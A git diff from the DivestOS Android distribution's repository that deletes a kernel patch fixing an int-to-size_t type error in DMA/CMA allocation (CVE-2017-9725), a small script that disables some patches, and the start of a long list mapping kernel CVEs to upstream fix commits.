-From 5479a3c164c8762b5bf91c5fae452882366adb6a Mon Sep 17 00:00:00 2001
-From: Maggie White
-Date: Wed, 5 Jul 2017 16:47:15 -0700
-Subject: mm: Fix incorrect type conversion for size during dma allocation
-
-This was found during userspace fuzzing test when a large size
-allocation is made from ion
-
-[] show_stack+0x10/0x1c
-[] dump_stack+0x74/0xc8
-[] kasan_report_error+0x2b0/0x408
-[] kasan_report+0x34/0x40
-[] __asan_storeN+0x15c/0x168
-[] memset+0x20/0x44
-[] __dma_alloc_coherent+0x114/0x18c
-[] __dma_alloc_noncoherent+0xbc/0x19c
-[] ion_cma_allocate+0x178/0x2f0
-[] ion_secure_cma_allocate+0xdc/0x190
-[] ion_alloc+0x264/0xb88
-[] ion_ioctl+0x1f4/0x480
-[] do_vfs_ioctl+0x67c/0x764
-[] SyS_ioctl+0x58/0x8c
-
-Bug: 38195738
-Signed-off-by: Rohit Vaswani
-Signed-off-by: Maggie White
-Change-Id: I6b1a0a3eaec10500cd4e73290efad4023bc83da5
----
- drivers/base/dma-contiguous.c | 4 ++--
- include/linux/dma-contiguous.h | 4 ++--
- 2 files changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/base/dma-contiguous.c b/drivers/base/dma-contiguous.c
-index f6e779e..9313bfc1 100644
---- a/drivers/base/dma-contiguous.c
-+++ b/drivers/base/dma-contiguous.c
-@@ -589,7 +589,7 @@ static void clear_cma_bitmap(struct cma *cma, unsigned long pfn, int count)
- * global one. Requires architecture specific get_dev_cma_area() helper
- * function.
- */
--unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
-+unsigned long dma_alloc_from_contiguous(struct device *dev, size_t count,
- unsigned int align)
- {
- unsigned long mask, pfn = 0, pageno, start = 0;
-@@ -604,7 +604,7 @@ unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
- if (align > CONFIG_CMA_ALIGNMENT)
- align = CONFIG_CMA_ALIGNMENT;
-
-- pr_debug("%s(cma %p, count %d, align %d)\n", __func__, (void *)cma,
-+ pr_debug("%s(cma %p, count %zu, align %d)\n", __func__, (void *)cma,
- count, align);
-
- if (!count)
-diff --git a/include/linux/dma-contiguous.h b/include/linux/dma-contiguous.h
-index 9e6fee9..d8d124e 100644
---- a/include/linux/dma-contiguous.h
-+++ b/include/linux/dma-contiguous.h
-@@ -117,7 +117,7 @@ static inline int dma_declare_contiguous_reserved(struct device *dev,
- return ret;
- }
-
--unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
-+unsigned long dma_alloc_from_contiguous(struct device *dev, size_t count,
- unsigned int order);
- bool dma_release_from_contiguous(struct device *dev, unsigned long pfn,
- int count);
-@@ -136,7 +136,7 @@ int dma_declare_contiguous(struct device *dev, phys_addr_t size,
- }
-
- static inline
--unsigned long dma_alloc_from_contiguous(struct device *dev, int count,
-+unsigned long dma_alloc_from_contiguous(struct device *dev, size_t count,
- unsigned int order)
- {
- return 0;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9725/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9725/4.4/0002.patch
deleted file mode 100644
index 4b363ca8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9725/4.4/0002.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From 1f8f9b566e8446c13b954220c226c58d22076f88 Mon Sep 17 00:00:00 2001
-From: Rohit Vaswani
-Date: Thu, 17 Sep 2015 17:28:13 -0700
-Subject: mm: Fix incorrect type conversion for size during dma allocation
-
-This was found during userspace fuzzing test when a large size
-allocation is made from ion
-
-[] show_stack+0x10/0x1c
-[] dump_stack+0x74/0xc8
-[] kasan_report_error+0x2b0/0x408
-[] kasan_report+0x34/0x40
-[] __asan_storeN+0x15c/0x168
-[] memset+0x20/0x44
-[] __dma_alloc_coherent+0x114/0x18c
-[] __dma_alloc_noncoherent+0xbc/0x19c
-[] ion_cma_allocate+0x178/0x2f0
-[] ion_secure_cma_allocate+0xdc/0x190
-[] ion_alloc+0x264/0xb88
-[] ion_ioctl+0x1f4/0x480
-[] do_vfs_ioctl+0x67c/0x764
-[] SyS_ioctl+0x58/0x8c
-
-Change-Id: Idc9c19977a8cc62c7d092f689d30368704b400bc
-Signed-off-by: Rohit Vaswani
----
- drivers/base/dma-contiguous.c | 2 +-
- include/linux/cma.h | 3 ++-
- include/linux/dma-contiguous.h | 4 ++--
- mm/cma.c | 4 ++--
- 4 files changed, 7 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/base/dma-contiguous.c b/drivers/base/dma-contiguous.c
-index 950fff9..a12ff98 100644
---- a/drivers/base/dma-contiguous.c
-+++ b/drivers/base/dma-contiguous.c
-@@ -187,7 +187,7 @@ int __init dma_contiguous_reserve_area(phys_addr_t size, phys_addr_t base,
- * global one. Requires architecture specific dev_get_cma_area() helper
- * function.
- */
--struct page *dma_alloc_from_contiguous(struct device *dev, int count,
-+struct page *dma_alloc_from_contiguous(struct device *dev, size_t count,
- unsigned int align)
- {
- if (align > CONFIG_CMA_ALIGNMENT)
-diff --git a/include/linux/cma.h b/include/linux/cma.h
-index a93438b..a76f8df 100644
---- a/include/linux/cma.h
-+++ b/include/linux/cma.h
-@@ -25,6 +25,7 @@ extern int __init cma_declare_contiguous(phys_addr_t base,
- extern int cma_init_reserved_mem(phys_addr_t base,
- phys_addr_t size, int order_per_bit,
- struct cma **res_cma);
--extern struct page *cma_alloc(struct cma *cma, int count, unsigned int align);
-+extern struct page *cma_alloc(struct cma *cma, size_t count,
-+ unsigned int align);
- extern bool cma_release(struct cma *cma, struct page *pages, int count);
- #endif
-diff --git a/include/linux/dma-contiguous.h b/include/linux/dma-contiguous.h
-index 569bbd0..fec734d 100644
---- a/include/linux/dma-contiguous.h
-+++ b/include/linux/dma-contiguous.h
-@@ -111,7 +111,7 @@ static inline int dma_declare_contiguous(struct device *dev, phys_addr_t size,
- return ret;
- }
-
--struct page *dma_alloc_from_contiguous(struct device *dev, int count,
-+struct page *dma_alloc_from_contiguous(struct device *dev, size_t count,
- unsigned int order);
- bool dma_release_from_contiguous(struct device *dev, struct page *pages,
- int count);
-@@ -144,7 +144,7 @@ int dma_declare_contiguous(struct device *dev, phys_addr_t size,
- }
-
- static inline
--struct page *dma_alloc_from_contiguous(struct device *dev, int count,
-+struct page *dma_alloc_from_contiguous(struct device *dev, size_t count,
- unsigned int order)
- {
- return NULL;
-diff --git a/mm/cma.c b/mm/cma.c
-index 8e9ec13..6343f77 100644
---- a/mm/cma.c
-+++ b/mm/cma.c
-@@ -338,7 +338,7 @@ err:
- * This function allocates part of contiguous memory on specific
- * contiguous memory area.
- */
--struct page *cma_alloc(struct cma *cma, int count, unsigned int align)
-+struct page *cma_alloc(struct cma *cma, size_t count, unsigned int align)
- {
- unsigned long mask, pfn, start = 0;
- unsigned long bitmap_maxno, bitmap_no, bitmap_count;
-@@ -348,7 +348,7 @@ struct page *cma_alloc(struct cma *cma, int count, unsigned int align)
- if (!cma || !cma->count)
- return NULL;
-
-- pr_debug("%s(cma %p, count %d, align %d)\n", __func__, (void *)cma,
-+ pr_debug("%s(cma %p, count %zu, align %d)\n", __func__, (void *)cma,
- count, align);
-
- if (!count)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/Fix.sh b/Patches/Linux_CVEs/Fix.sh
deleted file mode 100644
index 33fecde8..00000000
--- a/Patches/Linux_CVEs/Fix.sh
+++ /dev/null
@@ -1,27 +0,0 @@
-#!/bin/bash
-#DivestOS: A privacy oriented Android distribution
-#Copyright (c) 2017 Spot Communications, Inc.
-#
-#This program is free software: you can redistribute it and/or modify
-#it under the terms of the GNU General Public License as published by
-#the Free Software Foundation, either version 3 of the License, or
-#(at your option) any later version.
-#
-#This program is distributed in the hope that it will be useful,
-#but WITHOUT ANY WARRANTY; without even the implied warranty of
-#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-#GNU General Public License for more details.
-#
-#You should have received a copy of the GNU General Public License
-#along with this program. If not, see .
-
-mv CVE-2017-0794/ANY/0001.patch CVE-2017-0794/ANY/0001.patch.disabled
-mv CVE-2016-0819/ANY/0001.patch CVE-2016-0819/ANY/0001.patch.disabled
-mv CVE-2017-16USB/ANY/0007.patch CVE-2017-16USB/ANY/0007.patch.disabled
-
-#mv CVE-2016-0819/ANY/0.patch CVE-2016-0819/ANY/0.patch.disabled
-#mv CVE-2016-0774/ANY/0.patch CVE-2016-0774/ANY/0.patch.disabled
-#mv CVE-2016-8399/ANY/0.patch CVE-2016-8399/ANY/0.patch.disabled
-#mv CVE-2016-6741/3.10/0.patch CVE-2016-6741/3.10/0.patch.disabled
-#mv CVE-2014-0196/ANY/0.patch CVE-2014-0196/ANY/0.patch.disabled
-#mv CVE-2015-2922/ANY/0.patch CVE-2015-2922/ANY/0.patch.disabled
diff --git a/Patches/Linux_CVEs/Kernel_CVE_Patch_List.txt b/Patches/Linux_CVEs/Kernel_CVE_Patch_List.txt
deleted file mode 100644
index c07fd9e3..00000000
--- a/Patches/Linux_CVEs/Kernel_CVE_Patch_List.txt
+++ /dev/null
@@ -1,1973 +0,0 @@ -#Last checked 2017-11-25 -#This is a combined list from the following sources -# https://source.android.com/security/bulletin -# https://source.android.com/security/advisory -# https://cve.lineageos.org/api/v1/cves -# https://www.codeaurora.org/security-advisories -# https://www.codeaurora.org/security-advisories/security-bulletins -# https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md -# + some extras -#To Do -# Make another pass through LineageOS CVE tracker for more patch versions -#To add -# https://github.com/google/syzkaller/blob/master/docs/linux/found_bugs.md -# https://www.codeaurora.org/security-advisory/uncontrolled-memory-mapping-in-camera-driver-cve-2013-2595 -# https://www.codeaurora.org/security-advisory/multiple-issues-in-camera-drivers-cve-2014-9410-cve-2015-0568 -# https://portland.source.codeaurora.org/patches/quic/la/ -#The 'Untracked' folder contains patches from the following sources -# https://portland.source.codeaurora.org/patches/quic/la/CVE-fixes-patches.zip -CVE-2012-4220 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b -CVE-2012-4221 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=32682d16fb46a60a7952c4d9e0653602ff674e4b -CVE-2012-4222 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=1e76f61bb001b93795a227f8f808104b6c10b048 -CVE-2012-6657 - Link - ^3.5 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e10986d1d698140747fcfc2761ec9cb64c1d582 -CVE-2012-6689 - Link - ^3.5 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20e1db19db5d6b9e4e83021595eab0dc8f107bef -CVE-2012-6701 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=a70b52ec1aaeaf60f4739edb1b422827cb6f3893 -CVE-2012-6701 - Link - 
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a70b52ec1aaeaf60f4739edb1b422827cb6f3893 -CVE-2012-6703 - Depends - Link - https://github.com/torvalds/linux/commit/b35cc8225845112a616e3a2266d2fde5ab13d3ab - Link - https://github.com/torvalds/linux/commit/4dc040a0b34890d2adc0d63da6e9bfb4eb791b19 -CVE-2012-6704 - Link - ^3.5 - https://github.com/torvalds/linux/commit/82981930125abfd39d7c8378a9cfdf5e1be2002b -CVE-2013-2015 - Link - ^3.8 - https://github.com/android/kernel_common/commit/016a3592cc34fa349235b5a8b48af5cece2cbfeb -CVE-2013-2596 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=24b51892b863ad23a9fcb2a28a45e5cc15c2f3b5 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=7e9785f78415d32e0b17b1d296a172b66e0d2ab7 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=cdde1a87792a52274763eb006d326ca254ec3c63 -CVE-2013-2597 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=abd0d7da5cab6057dba752486e347b9d568e5f58 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=76fb3e419e2b149292c3adf1e9171e2b542831bf -CVE-2013-4312 - Depends - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a5a6cf8c405e826ff7ed1308dde72560c0ed4854 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=5ea820046ee399214221c0bb817eb35d304c9604 - Link - 4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=712f4aad406bb1ed67f3f98d04c044191f0ff593 - Link - 4.5 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=415e3d3e90ce9e18727e8843ae343eda5a58fad6 -CVE-2013-4736 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=fab0bc54f4b70fd1d85300731822379a487d66ca5 - Link - 
https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=8c5300aec8cd9882b89e9d169680221541da0d7f - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=81947189009afcfac17d1106101260c660421265 -CVE-2013-4737 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=4256415b296348ff16cd17a5b8f8dce4dea37328 -CVE-2013-4738 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=c9c81836ee44db9974007d34cf2aaeb1a51a8d45 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=28385b9c3054c91dca1aa194ffa750550c50f3c -CVE-2013-4739 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=8604847927f952cc8e773b97eca24e1060a570f2 -CVE-2013-4740 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05 -CVE-2013-6122 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05 -CVE-2013-6123 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=7beb04ea945a7178e61d935918d3cb152996b558 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm.git;a=commit;h=60e4af06161d91d5aeaa04c7d6e9f4345a6acdd4 -CVE-2013-6282 - Link - https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=76565e3d786bed66f247c682bd9f591098522483 -CVE-2013-7446 - Link - ^4.3 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/net/unix/af_unix.c?id=7d267278a9ece963d77eefec61630223fce08c6c - Link - ^4.3 - https://github.com/aosp-mirror/kernel_msm/commit/8a292b04183e82d59721ab0893e4216010aa3db9 - Link - ^4.3 - https://github.com/aosp-mirror/kernel_msm/commit/5bed19c9f463f9078063363779548c50aea271a0 -CVE-2014-0196 - Link - https://github.com/torvalds/linux/commit/4291086b1f081b869c6d79e5b7441633dc3ace00 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=1e5099713ce - Link - 3.4 - 
https://source.codeaurora.org/quic/la/kernel/msm/commit/?h=LA.BF.1.1.3_rb1.12&id=9aabfc9e7775abbbcf534cdecccc4f12ee423b27 -CVE-2014-0206 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=d36db46c2cba973557eb6138d22210c4e0cf17d6 -CVE-2014-3153 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e9c243a5a6de0be8e584c604d353412584b592f8 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13fbca4c6ecd96ec1a1cfa2e4f2ce191fe928a5e - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=54a217887a7b658e2650c3feff22756ab80c7339 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3eaa9fc5cd0a4d74b18f6b8dc617aeaf1873270 -CVE-2014-0972 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=7613c9d520ee4d227e635f6db0270d4cf26102bc - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=d7d07936a166e7421a6308eec443b707a9678580 -CVE-2014-0975 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=832666bda9606623c3cff5b14873553f82ec1281 -CVE-2014-0976 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=ee37138b8ceee6035c93756043eaac7eaa1c0948 -CVE-2014-1739 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e6a623460e5fc960ac3ee9f946d3106233fd28d8 -CVE-2014-2523 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=5b866eaa34e - Link - ^3.13 - https://github.com/torvalds/linux/commit/b22f5126a24b3b2f15448c3f2a254fc10cbc2b92 -CVE-2014-2706 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=1d147bfa64293b2723c4fec50922168658e613ba -CVE-2014-2851 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/patch/?id=b04c46190219a4f845e46a459e3102137b7f6cac -CVE-2014-3145 - Dupe - Link - 
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=314760e66c35c8ffa51b4c4ca6948d207e783079 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=05ab8f2647e4221cbdb3856dd7d32bd5407316b3 -CVE-2014-4014 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=23adbe12ef7d3d4195e80800ab36b37bee28cd03 -CVE-2014-4321 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=68c459daa22a26d6ca8f169baef6605ca8a285f2 -CVE-2014-4322 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=b9470692c228608ef0ec60747ac2732ad7ffedf0 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=e909d95e6bded328e388d5b8d123297bbbb70728 -CVE-2014-4323 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=014fa8def84c62893fa016e873c12de1da498603 -CVE-2014-4324 - Link - https://www.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=8ad163e831a2b2c30551edb360f168a604cdb0bb -CVE-2014-4655 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=82262a46627bebb0febcc26664746c25cef08563 -CVE-2014-4656 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=883a1d49f0d77d30012f114b2e19fc141beb3e8e -CVE-2014-4943 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=1179c8f1cac - Link - ^3.15 - https://github.com/torvalds/linux/commit/3cf521f7dc87c031617fd47e4b7aa2593c2f3daf -CVE-2014-5206 - Link - ^3.16 - https://github.com/torvalds/linux/commit/a6138db815df5ee542d848318e5dae681590fccd -CVE-2014-7822 - Link - 3.2-^3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=894c6350eaa -CVE-2014-7825 - Depends - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=6f25b4e75a8 - Link - 3.2 - 
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=8043761416d - Link - ^3.17 - https://github.com/torvalds/linux/commit/086ba77a6db00ed858ff07451bedee197df868c9 -CVE-2014-7970 - Link - 3.0 - https://github.com/LineageOS/android_kernel_samsung_smdk4412/commit/c88f7bbd8026761a615c9969d186ffa2a1a3da3c - Link - 3.4 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=9f7d53c09a1f87ebe228b55a83c1b8f952d76260 - Link - ^3.17 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0d0826019e529f21c84687521d03f60cd241ca7d -CVE-2014-8160 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d7cde286daa - Link - ^3.18 - https://github.com/torvalds/linux/commit/db29a9508a9246e77087c5531e45b2c88ec6988b -CVE-2014-8173 - Link - 3.9-^3.12 - https://github.com/torvalds/linux/commit/ee53664bda169f519ce3c6a22d378f0b946c8178 -CVE-2014-8709 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=338f977f4eb441e69bb9a46eaa0ac715c931a67f -CVE-2014-9322 - Depends - Link - https://android.googlesource.com/kernel/common/+/c22e479e335628ce8766cfbf06e2ba17e8f9a1bb - Link - https://android.googlesource.com/kernel/common/+/1b627d4e5e61e89b840f77abb3ca6711ad6ffbeb - Link - https://android.googlesource.com/kernel/common/+/4c941665c7368a34b146929b31949555e680a4ee - Link - https://android.googlesource.com/kernel/common/+/758f0dac9104b46016af98304656a0268ac3e105 - Link - https://android.googlesource.com/kernel/common/+/44d057a37868a60bc2eb6e7d1dcea701f234d56a - Link - https://android.googlesource.com/kernel/common/+/b9b9f908c8ae82b73b9d75181982028b6bc06c2b - Link - https://android.googlesource.com/kernel/common/+/e068734f9e7344997a61022629b92d142a985ab3 - Link - https://android.googlesource.com/kernel/common/+/fdc6c1052bc7d89a5826904fbb4318677e8442ce - Link - 
https://android.googlesource.com/kernel/common/+/211d59c0034ec9d88690c750ccd6da27f6952dc5 - Link - https://android.googlesource.com/kernel/common/+/c9e31d5a4747e9967ace6d05896c78516c4c0850 - Link - https://android.googlesource.com/kernel/common/+/e01834bfbafd25fd392bf10014451c4e5f34f829 -CVE-2014-9420 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f54e18f1b831c92f6512d2eedb224cd63d607d3d -CVE-2014-9529 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a3a8784454692dd72e5d5d34dcdab17b4420e74c -CVE-2014-9683 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=f2d130454e4 - Link - ^3.18 - https://github.com/torvalds/linux/commit/942080643bce061c3dd9d5718d3b745dcb39a8bc -CVE-2014-9715 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=33eedfe8ecb - Link - ^3.14 - https://github.com/torvalds/linux/commit/223b02d923ecd7c84cf9780bb3686f455d279279 -CVE-2014-9731 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0e5cc9a40ada6046e6bc3bdfcd0c0d7e4b706b14 -CVE-2014-9777 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=17bfaf64ad503d2e6607d2d3e0956f25bf07eb43 -CVE-2014-9778 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=af85054aa6a1bcd38be2354921f2f80aef1440e5 -CVE-2014-9779 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c?h=LA.BF.1.1.3_rb1.12&id=0b5f49b360afdebf8ef55df1e48ec141b3629621 -CVE-2014-9780 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=b5bb13e1f738f90df11e0c17f843c73999a84a54 -CVE-2014-9781 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/video/?h=LA.BF.1.1.3_rb1.12&id=a2b5237ad265ec634489c8b296d870827b2a1b13&context=20&ignorews=0&dt=0 -CVE-2014-9782 - Link - 
https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/patch/?id=2e57a46ab2ba7299d99d9cdc1382bd1e612963fb -CVE-2014-9783 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=2b1050b49a9a5f7bb57006648d145e001a3eaa8b - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=a7502f4f801bb95bff73617309835bb7a016cde5 -CVE-2014-9784 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=36503d639cedcc73880974ed92132247576e72ba -CVE-2014-9785 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=b4338420db61f029ca6713a89c41b3a5852b20ce -CVE-2014-9786 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/patch/?id=2fb303d9c6ca080f253b10ed9384293ca69ad32b -CVE-2014-9787 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=528400ae4cba715f6c9ff4a2657dafd913f30b8b -CVE-2014-9788 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=73bfc22aa70cc0b7e6709381125a0a42aa72a4f2 -CVE-2014-9789 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=5720ed5c3a786e3ba0a2428ac45da5d7ec996b4e -CVE-2014-9790 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?h=LA.BF.1.1.3_rb1.12&id=6ed921bda8cbb505e8654dfc1095185b0bccc38e - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit?h=LA.BF.1.1.3_rb1.12&id=9bc30c0d1832f7dd5b6fa10d5e48a29025176569 -CVE-2014-9791 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?h=LA.BF.1.1.3_rb1.12&id=9aabfc9e7775abbbcf534cdecccc4f12ee423b27 -CVE-2014-9792 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=a3e3dd9fc0a2699ae053ffd3efb52cdc73ad94cd -CVE-2014-9803 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/arch/arm64/include/asm/pgtable.h?h=linux-3.10.y&id=5a0fdfada3a2aa50d7b947a2e958bf00cbe0d830 -CVE-2014-9863 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=75eac48a48562f819f50eeff8369b296d89102d7 
-CVE-2014-9864 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=a1124defc680055e2f2a8c8e3da4a94ca2ec842e -CVE-2014-9865 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=e65a876a155de945e306f2726f3a557415e6044e -CVE-2014-9866 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=8e6daae70422ad35146a87700e6634a747d1ff5d -CVE-2014-9867 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=322c518689a7f820165ca4c5d6b750b02ac34665 -CVE-2014-9868 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=1f274b74c00187ba1c379971503f51944148b22f -CVE-2014-9869 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=8d1f7531ff379befc129a6447642061e87562bca - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=7a26934e4196b4aa61944081989189d59b108768 -CVE-2014-9870 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=4f57652fcd2dce7741f1ac6dc0417e2f265cd1de -CVE-2014-9871 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f615e40c706708f74cd826d5b19c63025f54c041 -CVE-2014-9872 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=fc787ebd71fa231cc7dd2a0d5f2208da0527096a -CVE-2014-9873 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=ef29ae1d40536fef7fb95e4d5bb5b6b57bdf9420 -CVE-2014-9874 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=56ff68b1f93eaf22e5e0284648fd862dc08c9236 -CVE-2014-9875 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=b77c694b88a994d077316c157168c710696f8805 -CVE-2014-9876 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=7efd393ca08ac74b2e3d2639b0ad77da139e9139 -CVE-2014-9877 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f0c0112a6189747a3f24f20210157f9974477e03 -CVE-2014-9878 - Link - 
